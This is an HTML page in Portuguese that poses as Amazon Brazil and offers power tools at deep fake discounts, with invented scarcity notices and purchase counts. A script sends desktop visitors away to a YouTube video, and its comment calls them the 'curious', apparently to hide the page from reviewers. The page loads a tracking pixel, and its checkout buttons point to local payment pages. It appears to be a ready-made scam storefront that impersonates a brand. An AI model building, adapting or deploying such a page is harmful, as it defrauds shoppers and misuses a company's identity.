<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Amazon</title>
    
<script>
    // Verifica se é mobile
    const isMobile = /iPhone|iPad|iPod|Android/i.test(navigator.userAgent);

    if (!isMobile) {
      // Se NÃO for mobile, redireciona
      window.location.href = "https://www.youtube.com/watch?v=iiBiAdkts4U"; // Troca aqui pelo link pros curioso
    }
  </script>


 <script>
  window.pixelId = "68c4e1b8c4e54b2352572352";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>
 <script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-xcod-sck
  data-utmify-prevent-subids
  async
  defer
></script> 
 
    
    <style>
        body {
            margin: 0;
            font-family: Arial, sans-serif;
        }

        .header {
            background-color: #232f3e;
            color: white;
            display: flex;
            align-items: center;
            justify-content: space-between;
            padding: 10px;
            flex-wrap: wrap;
            margin: 0;
        }

        .header .logo {
            display: flex;
            align-items: center;
        }

        .header .logo img {
            height: 35px;
        }

        .header .user-cart {
            display: flex;
            align-items: center;
            gap: 10px;
            font-size: 14px;
        }
         .header .user-cart img {
            width: 18px; /* Largura padrão */
            height: 18px; /* Altura padrão */
            vertical-align: middle; /* Alinha o ícone verticalmente com o texto */
        }


        .header .user-cart a {
            color: white;
            text-decoration: none;
        }

        .header .search {
            flex-grow: 1;
            display: flex;
            align-items: center;
            margin: 10px 0;
            width: 100%;
            order: 2;
        }

        .header .search input {
            flex-grow: 1;
            padding: 10px;
            border: none;
            border-radius: 5px 0 0 5px;
            font-size: 14px;
        }

        .header .search button {
            background-color: #f3a847;
            border: none;
            padding: 10px;
            border-radius: 0 5px 5px 0;
            cursor: pointer;
        }

        .header .search button img {
            height: 16px;
        }

        .location-bar {
            background-color: #37475a;
            color: white;
            padding: 8px;
            font-size: 14px;
            display: flex;
            align-items: center;
            flex-wrap: wrap;
        }

        .location-bar img {
            margin-right: 5px;
            height: 15px;
        }

        .location-bar span {
            color: #f3a847;
            cursor: pointer;
        }

        @media (min-width: 768px) {
            .header {
                flex-wrap: nowrap;
            }

            .header .search {
                width: auto;
                margin: 0 15px;
                order: 0;
            }

            .header .user-cart {
                font-size: 14px;
            }

            .location-bar {
                font-size: 14px;
            }
        }
    </style>
</head>
<body>
    <div class="header"style="margin: 0;">
        <div class="logo">
            <img src="images/logoamazon1.png" alt="Amazon Logo">.com.br
        </div>
        <div class="user-cart">
            <a href="#">Faça seu login</a>
            <a href="#">
                <img src="images/user.png" alt="Cart Icon">
                <img src="images/cart2.png" alt="Cart Icon">
            </a>
        </div>
        <div class="search">
            <input type="text" placeholder="Pesquisar Amazon.com.br">
            <button>
                <img src="https://img.icons8.com/material-rounded/24/search.png" alt="Search Icon">
            </button>
        </div>
    </div>
    <div class="location-bar" >
        <img src="images/local.png" alt="Location Icon">
        <div>A entrega será feita em: Prazo estimado — <span>5 a 7 Dias</span></div>
    </div>
    </body>
    
      <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f9f9f9;
            margin: 0;
            padding: 0;
        }

        .section {
            display: flex;
            justify-content: center;
            padding: 2px;
        }

        .card {
            background-color: #fff;
            border-radius: 10px;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
            width: 600px;
            padding: 15px;
            display: flex;
            align-items: center;
            gap: 20px;
        }

        .product-image {
            width: 150px;
            height: auto;
        }

        .product-details {
            text-align: left;
            flex: 1;
        }

        .product-title {
            font-size: 12px;
            font-weight: bold;
            margin: 0 0 0px;
        }

        .options {
            font-size: 8px;
            color: #0073e6;
            text-decoration: none;
            margin-bottom: 1px;
            display: inline-block;
        }

        .rating {
            display: flex;
            align-items: center;
            font-size: 10px;
            margin-bottom: 1px;
        }

        .stars {
            color: #ff9800;
            margin-right: 5px;
        }

        .price {
            font-size: 18px;
            font-weight: bold;
            color: #333;
            margin: 1px 0;
        }

        .old-price {
            font-size: 14px;
            text-decoration: line-through;
            color: #777;
        }

        .info {
            font-size: 11px;
            color: #666;
            margin: 1px 0;
        }
        
        .info1 {
            font-size: 11px;
            color: red;
            margin: 1px 0;
        }

        .prime {
            color: #0073e6;
            font-weight: bold;
            margin-bottom: 10px;
        }

        .delivery {
            font-size: 9px;
            color: #333;
            margin-bottom: 10px;
        }

        .add-to-cart {
            background-color: #FFD700;
            color: #333;
            font-size: 9px;
            font-weight: bold;
            border: none;
            border-radius: 17px;
            padding: 10px 42px;
            cursor: pointer;
            text-transform: uppercase;
        }
        
        .esgotado {
            background-color: #DB0F27;
            color: #fff;
            font-size: 9px;
            font-weight: bold;
            border: none;
            border-radius: 17px;
            padding: 10px 32px;
            cursor: pointer;
            text-transform: uppercase;
        }

        .add-to-cart:hover {
            background-color: #f7ca00;
        }
       
      
    </style>
</head>
<body>
     <img style="width:100%" src="images/banner4.gif">
   
   
<section class="section">
  <div class="card">
    <img src="https://m.media-amazon.com/images/I/81hJD-odFeL._AC_SL1500_.jpg" alt="Furadeira de Impacto 560W" class="product-image">
    <div class="product-details">
      <h1 class="product-title">WAP Parafusadeira e Furadeira à Bateria 12V BPF-12K3, Kit de 13 Acessórios e Maleta, Empunhadura Emborrachada, Bivolt</h1>
      <a href="#" class="options">Opções: 1 voltagem bivolt</a>
      <div class="rating"><span class="stars">★★★★★</span><span>(1.245)</span></div>
      <div class="info">Mais de 1.5 mil compras no mês passado</div>
      <div style="background-color:#cc0000;color:#fff;font-size:12px;font-weight:bold;text-align:left;padding:3px;display:inline-block;border-radius:2px">Semana do Consumidor</div>
      <div class="price">R$ 79,90</div>
      <div class="old-price">R$ 169,90</div>
      <div class="info1">Últimas 8 unidades disponíveis</div>
      <div class="delivery">Receba em até <strong>5 dias</strong><br>Opção de frete <b>GRÁTIS</b> disponível</div>
      <button class="add-to-cart" onclick="window.location.href='./1'">Finalizar Compra</button>
    </div>
  </div>
</section>

<section class="section">
  <div class="card">
    <img src="https://m.media-amazon.com/images/I/71X7NRVZmIL._AC_SL1500_.jpg" alt="Esmerilhadeira Angular 5&quot; 600W" class="product-image">
    <div class="product-details">
      <h1 class="product-title">Mini Esmerilhadeira lixadeira Angular 220v/110v Esmerilhadeira com Controle de Velocidade com 2 Bateria e 8 Pcs Discos</h1>
      <a href="#" class="options">Opções: 1 tamanho</a>
      <div class="rating"><span class="stars">★★★★★</span><span>(1.002)</span></div>
      <div class="info">Mais de 1.7 mil compras no mês passado</div>
      <div style="background-color:#cc0000;color:#fff;font-size:12px;font-weight:bold;text-align:left;padding:3px;display:inline-block;border-radius:2px">Semana do Consumidor</div>
      <div class="price">R$ 59,90</div>
      <div class="old-price">R$ 159,90</div>
      <div class="info1">Últimas 12 unidades disponíveis</div>
      <div class="delivery">Receba em até <strong>5 dias</strong><br>Opção de frete <b>GRÁTIS</b> disponível</div>
      <button class="add-to-cart" onclick="window.location.href='./2'">Finalizar Compra</button>
    </div>
  </div>
</section>

<section class="section">
  <div class="card">
    <img src="https://m.media-amazon.com/images/I/51pzJ7DmLeL._AC_SX679_.jpg" alt="Lixadeira Roto-Orbital 250W" class="product-image">
    <div class="product-details">
      <h1 class="product-title">Lixadeira com Potência de 360W, 110V, Lixadeira Para Polimento, Lixadeira Elétrica, Lixadeira de Parede, Lixadeira Elétrica, Lixadeira Elétrica, Lixadeira Esmerilhadeira, Esmerilhadeira</h1>
      <a href="#" class="options">Opções: 1 tamanho</a>
      <div class="rating"><span class="stars">★★★★★</span><span>(1.148)</span></div>
      <div class="info">Mais de 1.3 mil compras no mês passado</div>
      <div style="background-color:#cc0000;color:#fff;font-size:12px;font-weight:bold;text-align:left;padding:3px;display:inline-block;border-radius:2px">Semana do Consumidor</div>
      <div class="price">R$ 49,90</div>
      <div class="old-price">R$ 129,90</div>
      <div class="info1">Últimas 6 unidades disponíveis</div>
      <div class="delivery">Receba em até <strong>5 dias</strong><br>Opção de frete <b>GRÁTIS</b> disponível</div>
      <button class="add-to-cart" onclick="window.location.href='./3'">Finalizar Compra</button>
    </div>
  </div>
</section>

<section class="section">
  <div class="card">
    <img src="https://m.media-amazon.com/images/I/71IExmFwdmL._AC_SX679_.jpg" alt="Serra Tico-Tico 550W" class="product-image">
    <div class="product-details">
      <h1 class="product-title">BLACK+DECKER Serra Tico Tico, Ferramenta Elétrica, Acompanha Lâmina para Madeira, Potência 400 W, Modelo BES 602, 220V</h1>
      <a href="#" class="options">Opções: 1 tamanho</a>
      <div class="rating"><span class="stars">★★★★★</span><span>(986)</span></div>
      <div class="info">Mais de 1.9 mil compras no mês passado</div>
      <div style="background-color:#cc0000;color:#fff;font-size:12px;font-weight:bold;text-align:left;padding:3px;display:inline-block;border-radius:2px">Semana do Consumidor</div>
      <div class="price">R$ 69,90</div>
      <div class="old-price">R$ 129,90</div>
      <div class="info1">Últimas 7 unidades disponíveis</div>
      <div class="delivery">Receba em até <strong>5 dias</strong><br>Opção de frete <b>GRÁTIS</b> disponível</div>
      <button class="add-to-cart" onclick="window.location.href='./4'">Finalizar Compra</button>
    </div>
  </div>
</section>

<section class="section">
  <div class="card">
    <img src="https://m.media-amazon.com/images/I/713vuYqQbsS._AC_SX679_.jpg" alt="Serra Circular 1100W" class="product-image">
    <div class="product-details">
      <h1 class="product-title">Conjunto de chaves de fenda de precisão 115 em 1 kit de ferramentas de reparo com kit de driver magnético, conjunto de chaves de fenda de precisão eletrônica com bolsa portátil para computador de reparo, telefone celular, PC, iPhone, tablets</h1>
      <a href="#" class="options">Opções: 1 tamanho</a>
      <div class="rating"><span class="stars">★★★★★</span><span>(743)</span></div>
      <div class="info">Mais de 1.1 mil compras no mês passado</div>
      <div style="background-color:#cc0000;color:#fff;font-size:12px;font-weight:bold;text-align:left;padding:3px;display:inline-block;border-radius:2px">Semana do Consumidor</div>
      <div class="price">R$ 27,90</div>
      <div class="old-price">R$ 79,90</div>
      <div class="info1">Últimas 5 unidades disponíveis</div>
      <div class="delivery">Receba em até <strong>5 dias</strong><br>Opção de frete <b>GRÁTIS</b> disponível</div>
      <button class="add-to-cart" onclick="window.location.href='./5'">Finalizar Compra</button>
    </div>
  </div>
</section>

<section class="section">
  <div class="card">
    <img src="https://m.media-amazon.com/images/I/61urycTG-AL._AC_SX679_.jpg" alt="Parafusadeira/Furadeira 12V" class="product-image">
    <div class="product-details">
      <h1 class="product-title">Caixa de Ferramentas Menegotti Max 110 Peças – Catracas, Soquetes, Alicates, Bits e Chaves – Uso Profissional com Maleta Reforçada</h1>
      <a href="#" class="options">Opções: 1 tamanho</a>
      <div class="rating"><span class="stars">★★★★★</span><span>(2.304)</span></div>
      <div class="info">Mais de 2.0 mil compras no mês passado</div>
      <div style="background-color:#cc0000;color:#fff;font-size:12px;font-weight:bold;text-align:left;padding:3px;display:inline-block;border-radius:2px">Semana do Consumidor</div>
      <div class="price">R$ 39,90</div>
      <div class="old-price">R$ 99,90</div>
      <div class="info1">Últimas 9 unidades disponíveis</div>
      <div class="delivery">Receba em até <strong>5 dias</strong><br>Opção de frete <b>GRÁTIS</b> disponível</div>
      <button class="add-to-cart" onclick="window.location.href='./6'">Finalizar Compra</button>
    </div>
  </div>
</section>

<section class="section">
  <div class="card">
    <img src="https://m.media-amazon.com/images/I/61sMv8zlMoL._AC_SX679_.jpg" alt="Micro Retífica 130W" class="product-image">
    <div class="product-details">
      <h1 class="product-title">MAKITA KIT DE ACESSORIOS COM 34 PECAS B-68498</h1>
      <a href="#" class="options">Opções: 1 tamanho</a>
      <div class="rating"><span class="stars">★★★★★</span><span>(1.118)</span></div>
      <div class="info">Mais de 1.6 mil compras no mês passado</div>
      <div style="background-color:#cc0000;color:#fff;font-size:12px;font-weight:bold;text-align:left;padding:3px;display:inline-block;border-radius:2px">Semana do Consumidor</div>
      <div class="price">R$ 49,90</div>
      <div class="old-price">R$ 119,90</div>
      <div class="info1">Últimas 10 unidades disponíveis</div>
      <div class="delivery">Receba em até <strong>5 dias</strong><br>Opção de frete <b>GRÁTIS</b> disponível</div>
      <button class="add-to-cart" onclick="window.location.href='./7'">Finalizar Compra</button>
    </div>
  </div>
</section>

<section class="section">
  <div class="card">
    <img src="https://m.media-amazon.com/images/I/61bEJfpz90L._AC_SX679_.jpg" alt="Carregador de Bateria 12V Inteligente" class="product-image">
    <div class="product-details">
      <h1 class="product-title">Mini Motosserra Elétrica SparkBR 6" Recarregável 21V 2 Baterias Maleta Corrente Extra Lubrificação LEDIndicador Trava Segurança Acessórios</h1>
      <a href="#" class="options">Opções: 1 tamanho</a>
      <div class="rating"><span class="stars">★★★★★</span><span>(589)</span></div>
      <div class="info">Mais de 900 compras no mês passado</div>
      <div style="background-color:#cc0000;color:#fff;font-size:12px;font-weight:bold;text-align:left;padding:3px;display:inline-block;border-radius:2px">Semana do Consumidor</div>
      <div class="price">R$ 59,90</div>
      <div class="old-price">R$ 279,90</div>
      <div class="info1">Últimas 4 unidades disponíveis</div>
      <div class="delivery">Receba em até <strong>5 dias</strong><br>Opção de frete <b>GRÁTIS</b> disponível</div>
      <button class="add-to-cart" onclick="window.location.href='./8'">Finalizar Compra</button>
    </div>
  </div>
</section>

    
   
    
  
        
        
</body>
 <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }
        .footer {
            background-color: #232F3E;
            color: white;
            text-align: center;
            padding: 20px;
            margin-top: 20px;
        }
        .footer a {
            color: #ddd;
            text-decoration: none;
            margin: 0 10px;
            display: inline-block;
        }
        .footer a:hover {
            color: white;
        }
        .footer p {
            margin: 10px 0 0;
            font-size: 12px;
        }
    </style>
</head>
<body>
    <footer class="footer">
        <img style="width: 20%" src="images/logoamazon1.png"><br><br>
        <a href="#">Termos de Uso</a>
        <a href="#">Política de Privacidade</a>
        <a href="#">Ajuda</a>
        <p>&copy; 2025 Amazon. Todos os direitos reservados.</p>
    </footer>
</body>
</html>
